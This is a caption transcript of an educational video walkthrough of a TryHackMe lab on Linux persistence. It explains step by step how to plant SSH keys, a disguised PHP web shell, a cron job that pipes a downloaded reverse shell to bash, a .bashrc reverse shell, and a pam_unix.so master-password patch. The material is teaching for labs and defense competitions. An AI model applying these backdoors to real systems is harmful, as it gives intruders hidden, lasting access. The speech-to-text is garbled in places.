TryHackMe Linux Backdoors Official Walkthrough

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey everyone welcome back to another video here on darksack i am dark and today we're going to be taking a look at the room linux backdoors on try hackme learn all the different techniques used to backdoor a linux machine this is going to be how we establish persistence and make sure that we can still get back in after we have compromised a machine now why would you want to learn how to do this this is mostly going to be for red team operations when you're doing longer engagements and you want to make sure that you can't be kicked out easily losing access to a machine that you've already rooted is very annoying this is something that even more so for cyber defense tournaments this is going to be something that you're going to want to know i do recommend becoming film warrior with command and control frameworks as well as the linux backdoors but it's good having a mix of that just because if you're kicked out with one method you still have the other one usually to fall back on that being said let's go ahead and dive into task one introduction hey everyone this room is dedicated for learning common linux backdoor techniques a backdoor is simply something we can do to ensure our consistent access to the machine so even if the machine is rebooted shut down or whatever we'd still be able to have access to it keep in mind this is when the machine is back on and connected the internet or connected to whatever network we're on if we're on the same network with it these aren't actual vulnerabilities but just ways to maintain access on a target to recreate a bat or all backdoor techniques shown in this room you could simply try them all on your own machine or use the thm attack box as it's safer and it doesn't matter if you screw anything up and i'm going to go and start the attack box now just in case we want to replicate any of those i'll mark that as complete i get my nice streak there let's move into task two taking a look at ssh back doors the first back door we are going to look at is the ssh back door the ssh backdoor essentially consists of leaving our ssh keys in some user's home directory usually the user would be root as it's the user with the highest privileges however if you want to be tricky you can put them in non-root with pseudo powers it's one of those things where keep in mind roots going to be under the highest amount of scrutiny it's a little bit of creativity there to maintain access in this way so let's generate a set of ssh keys with ssh key gen to do so simply run the command ssh dash keygen as shown below and we'll do that on the attack machine here in a moment once it is up so running this is going to run this little sequence right here we can enter in a passphrase if we want to have the rsa keys uh protected with a password you can see the random fingerprint here and then the random art just showing that the keys that were generated are truly random uh with this little bit there when you run this two times in a row this will be different and that that's the main purpose of it now that we have uh two keys one private key and one public key we can now go to the root dot ssh and leave our public key there don't forget to rename the public key to authorized keys and we'll take a look at that in just in a moment this is just a simple text file it's not anything very complicated and this can trip people up just because a lot of times it's assumed that this is something more complex than just a text file if the directory.ssh is not present you can always create it using the command makeder.ssh this does need to be in the home directory or in the home directory of whatever user you're going to backdoor in this way a lot of times this will exist especially within the development environment if you're working in an actively developed uh server range that's something that most devs are probably going to be using private key authentication to get in now that we have left our back door we can simply log in as root before doing so give the private key here and we'll close this give the private key the right permissions using chamod 600 id underscore rsa and what we're going to go ahead and do is we'll take a look at the dot ssh directory i'll show you where that is just so that you're familiar with that and we'll run the id ssh keygen command rather to show that generation process let's go ahead and keep reading and once this is ready to cooperate we'll go into that so we're going to set the permissions this is really important if you do not have the correct permissions on this the linux file system will say hey this has two permission or two permissive typically permissions it needs to be locked down a little bit more this is recognizing this is a sensitive file that we need to treat it as being a sensitive file uh let's go ahead we'll continue in this in a moment let's go ahead and run or we can take a look at the home directory and we do ls so we can see that we are in the slash root home directory if we do ls tech lsa to show hidden directories we can see that we do sure enough have a dot ssh directory if we go to cd.ssh we are now in that hidden directory and if we run ls we can see that we do have authorized keys in here and if we do less on authorized keys we can see it's just a simple text file so you have the actual uh key right here this is the public key in this specific case we use the private key when we are going to authenticate uh the private key is the one that we keep to ourselves and don't leave them the public uh space in this way so pretty straightforward if you just have uh if you don't have the authorized keys file existing yet you can either cat the information into it and make the file or you just rename your uh key to this a lot of people will just rename it because it's well easier so uh with regards to the permissions this is necessary because if we don't do it ssh will complain about permissions not being secure enough on the key and will most likely not let us use it yep it will complain a lot after giving the key the right permissions we can do ssh dash i so identity key your id underscore rsa rather and then we're specifying the location of this this is assuming that it's in the same directory that we are running ssh from uh typically this won't be the case here you'll want to put either a relative or absolute path there and then root or whatever user at ip address here to log into our desired machine one thing to note about this backdoor this backdoor really isn't hidden at all anyone with the right permissions uh so anyone that can actually log in as root uh would be able to remove our ssh public key or the file authorized keys entirely in what directory do we place our keys that's gonna be dot ssh what flag in ssh do we use to show our private key or rather use it that's gonna be dash i let's go ahead and we'll cd dot to get out of the ssh directory and we're going to jump into task three php back doors let's now get into the second back door php backdoors if you get root access on a linux host you will likely you will most likely search for creds or any uh useful information in the web root uh this is if a website is running on the linux hosted very common that if you compromise a website it's probably gonna be linux the web root directory is usually located in var www.html what you have to know is that whatever you leave in var www.html will be available for everyone to use in their browser now that you know that you can try creating a php file with any name and try putting this inside or this piece of code inside of it so you can see that this is just a php code block that is looking in the request for a parameter called command and whatever that command is it's passing to shall exact here from the request so think of this as just running the command itself this gives us a back door with potentially a secret file name that we can just use execute arbitrary commands this code simply takes the parameter cmd and will execute anything that is being given to that parameter notice that we are using the dollar sign underscore request cmd which means that you can pass the parameter either in a git or any or post request data which is kind of interesting now that the file is saved and ready we can try to query it if you left the file in var www.htmlshell.php this is super obvious so be aware of that you should be able to access it directly using uh so you can just go to that website as long as the web server is on and it's running php you should be able to access this again very obvious name this is something i wouldn't recommend naming it you ideally in this case if you want to actually backdoor a machine again for the sake of maybe a competition or if you're maintaining persistence within a penetration test you're going to want to name this maybe something more benign for example welcome.php or gettingstarted.php something that people don't want to exist or maybe administration.php or administration backup.php keep that in mind one of the things there is you want to make sure that it's not obvious if you left the shell somewhere else look in what directory it is uh and try accessing it by doing something like that so you can just navigate to the subdirectory typically the further down you can hide this the better but generally speaking a lot of production servers so one thing to keep an eye out for this is a lot of production servers update via scripts which is really handy if you are a developer now the that's uh great and all uh because uh a lot of times it will just nuke what's in the web directory everything there is just gonna be gone or overwritten so you kind of have to play around with that if you are fighting against something that is being continuously updated you might lose your shell so this is something that can be a little bit tricky and again if it with it being in the web directory and part of the website anyone can see it so you might not be the one using your backdoor keep that in mind try adding this piece of code in already existing php files in var www.html adding it a little bit more towards the middle files will make our malicious actions a little more secret this is something that keep in mind organizations will be running checksums in this case so this will not work this is more of a cyber defense thing or against inexperienced defenders in this specific case this is something that if you're doing a normal pen test this is not acceptable this is stuff that if you are just going to find vulnerabilities and you don't necessarily care about being you should not be necessarily focusing on persistence so just keep that in mind change the cmd comp uh parameter to something else anything actually uh you don't really want to have cmd here this is a massive red flag anyone that's done any boxes is especially people that are more seasoned in industry are gonna know what this is and they're gonna be looking for it you understand what a php backdoor is yep we do so we're gonna go ahead and mark that as complete and move it to task four cron cronjom backdoors this is one of the more interesting backdoor techniques let's now get into the third backdoor technique this backdoor consists of creating a cron job think of this as a scheduled task if you're coming from windows land if you take a look at your cron jobs file which is and we'll take a look at that etsy cron job you would see something like this and it looks like we don't have in that uh or crontab rather seemed wrong to me that's a crown tab there we go so we can see that we have uh just some basic things here um these are ones that just come built in with cali so keep that in mind but this is the basic structure of a cron tab we don't need to look at this too too much know that we can schedule tasks with this a lot of times you just want to copy one that's already there this represents all the tasks that are scheduled to run at some time on your machine once you have root access on any host you can add any scheduled tests you could even just configure a task where every minute a reverse shell is sent to you which is exactly what we're going to do notice the two letters on top of the task m and h so we have m right here and then h right here m is meant to line up with this column and then h mentor uh ryan line up with this column then we have day of month uh month i believe this is day of the week as well so you have a lot of configuration and you can see what user is running as and what the actual command is very straightforward very simple but very effective for using especially within the normal management environment those are the letters that indicate if the task should be run every hour or every minute uh and uh we'll get into a little bit of how this breaks down in just a second in the example above you can see that there is a an asterisk or a star symbol under the age that means the following task would run every hour so you can see that right here this runs every hour every hour at 17 minutes in now let's get to our back door add this line into our cron job file this is the actually i believe that might be every 17 minutes i'm not sure that's one of those things that again typically what you're doing with this is just replicating one of the already your tests already in here keep in mind this is also very very obvious for anyone that's doing forensics on this so you're typically going to want to avoid this where possible there are better methods to do this and again this is really where the value of having that c2 is going to be at because you can live in memory and that's really where you want to be ultimately so adding our back door we can see that we are having this round on every minute of every hour of every day of the month uh we are curling and so we're sending this back door to our shelf notice that we put a star symbol to everything this means that our task will run every minute every hour every day etc we first use curl to download a file and then we pipe it to bash so we're saying hey we want to get that file which is just our shell in this case and then we're sending it a bash to actually execute it the contents of the shell file that we already uh using are simply so this starts out with a shebang i've been bashed saying that it needs to be wrong with bash and then this is just sending a bash shell to the ip and then the port that we specify pretty straightforward we would have to run an http server serving our shell in this specific case you can achieve this by running python3-mhdp.server 8080. this is something to commit to memory if you don't already have it memorized i would put this in your notes once our shell gets downloaded it will be executed by bash and we would get a shell don't forget to listen on your specified port with netcat nvlp and then port so setting up your listener here please note that this backdoor isn't really hidden because any everyone can see cron tabs by just looking in the crown tab file what does the letter m mean in crontabs that's going to be month or let's see months there we go maybe oh it might be minute there we go i'm thinking the wrong thing this month is m-o-n there we go and then h is going to be our and there we go again this is something that just be aware this is very very obvious just if you can this is one of those things to have as a backup and potentially just truck on there for fun there are better ways of doing this this is one to be aware of though this is a little bit more interesting when you consider within the privilege escalation vector you're typically going to be looking at the scheduled tasks more so from looking at something that you can exploit for performing purvesk putting it as a backdoor is far less common but again still something to consider we'll go and mark that as complete and then move into task five dot bash rc backdoors something a lot more interesting let's now get into the dot bash rc backdoor if a user has bash as their login shell the dot bash rc file in their home directory is executed when an interactive session is launched so if you know any users that log on to their system quite often targeting devs in this case can be very effective you could simply run this command to include your reverse shell in to their bash rc this is something that not as many people know about and it is very very useful this is one that especially within that cyber defense competition range this is simple it's effective and you're probably not going to get caught so you can see very straight one uh one liner here again where make sure you change that ip and port with your ip and port but this is a great way to have a secondary back door you can shell every single user on the system that has a dot bash rc so you make sure that you're getting shells every single time this happens just make sure that you have a nat cat listener ready so that you can receive that shell so and we have a note right here to make sure that you are ready to actually catch that this attack is very sneaky as no one really thinks about ever checking their dot rc file this is one that if you are a defense team uh for cyber defense competitions make sure you check this when you are getting your machine this is probably already infected on the other hand if you you can't exactly know if there are any users will actually log into their system so you might wait a really long period of time this is where putting this in every single user stop bash rc can really pay off you understand what the uh dot bash rc back torque technique so we're going to mark that as complete and we're going to move into the final task pam underscore unix dot so back doors let's get into the fifth and last backdoor of this room there are many many more backdoors available other than the five shown in this room this is just a really nice starter set especially as you are starting to compromise boxes and get it a little bit familiar with offensive uh security you can start practicing these and they're a lot of fun this is one of those things that as you complete ctf so maybe the mystery robot room go back do this try setting up some backdoors and play around with it a good resource that i found really helpful so the room creator when creating this room is this link it looks like that is a nine ways to backdoor a linux box uh article probably worth checking out so feel free to take a look through there okay so now on to the fifth backdoor again commentary on this i've said it a couple times in this room be sure to check out uh more specifically the uh c2 frameworks because a lot of them have automatic backdoors that are built in and those are a lot of times more flexible and they're going to tie automatically into your c2 framework which is going to give you a lot more power the vector that we are going to look at is the pam underscore unix dot so backdoor if you don't know what the file pam underscore unix.so is well it is simply one of the many files in linux that is responsible for authentication pam it stands for in this case plugable authentication modules i believe uh ssh ties in this this is something that if you ever have to get kerberos working with a linux box hopefully it's not on freebsd i've had a lot of trouble trying to get cabreros tied into that but it's one of these things that you'll become very very familiar with pam very quickly so let's actually get into the back door so we can see that we have this little snippet of code as seen here the file pim underscore unix dot so uses the unix verify password function to verify the user supply password and we can see that we have that right here now let's look at this screenshot don't worry too much if this is going a little bit over your head just know that we have this method that we are targeting particular so taking a look at this screenshot we can see that we have added a new line of code or a new line to our code if string compare uh p so the password equals 0x and then the string we are going to make sure that we are returning this as uh successful so we are adding essentially a uh verification here we're actually going to walk through it here we're adding an extra step to this verification which we can just have our own backdoor password in so uh first we'll have to know what the function sgr cmp does this function basically compares two strings in the screenshot above we compare the variable p and the string 0x uh i'm not going to butcher that the variable p stands for the user supplied password in other words the password that is uh that the user supplied it's just going to be what's entered in attacks typically especially if they're using a standard login you can also see the uh not equal to zero at the end of the statement this means if uh not successful so if the variable p user supply password and the string are not the same the unix uh uh so it will pass it to the actual uh verification method here so we have another way that we can actually uh we're adding a step beforehand before the actual authentication method so if the password matches this we can log in automatically if not we're going to go to the standard authentication there so on the other hand if the variable and the string are the same the authentication is a success we will mark the success by using pam underscore success which we can see right here so this backdoor essentially consists of adding your own password to the pam underscore unix.so since you know the password that you added into the file you will always be able to authenticate with that password until it's removed from that specific file so let's do a little recap say a user types the password password123 and tries to authenticate we will compare his password uh to the string that we've inserted into this if the strings match authentication is successful so we've added that in that we can just authenticate as any user but those two string if they don't match uh the authentication will just be passed to the standard unix verify password function and then it just does no more authentication this is just comparing it to the user's password from etsy shadow and making sure that they're the same and allowing that user to log in this is how the intended authentication should work however this technique is called a backdoor as you add your own password that you can always use to log in as nobody uh and it takes out of the pam underscore unix iso so we're adding our own password if we can't authenticate it as any user uh this path or back tour is really hard to spot as once again nobody really thinks about looking into such files uh this is a really good one this is one that i definitely would say would not get caught immediately this is definitely a lot lesser known um and this is one that i definitely would recommend having in your arsenal since this method is slowly becoming more and more popular you probably won't be able to use it every time as everyone would surely slowly but surely understand how to protect themselves so you can see some resources there we can go and mark this as complete since we understand the art of linux backdoors and we'll mark this as complete to go ahead and finish the room so moving forward i would definitely recommend taking these and applying them to a linux box that you've already gone through run through it again it could just be a simple one practice these backdoors start getting them into muscle memory so that you are familiar with them they're very useful for engagements and especially this one and let's see the bash rc backdoor those are really going to be the ones that are going to be very very very valuable tools in your arsenal otherwise that's going to do it for this video if you have any questions i've left linked to the try hacking discord as well as the darksec discord in the description below otherwise until next time happy hacking

Info

Channel: DarkSec

Views: 8,314

Rating: undefined out of 5

Keywords: infosec, tryhackme, box, hacking, learn, darkstar, darksec, educational, darkstar7471, try, hack, me

Id: -xHk7N3vF-A

Channel Id: undefined

Length: 24min 9sec (1449 seconds)

Published: Fri Apr 23 2021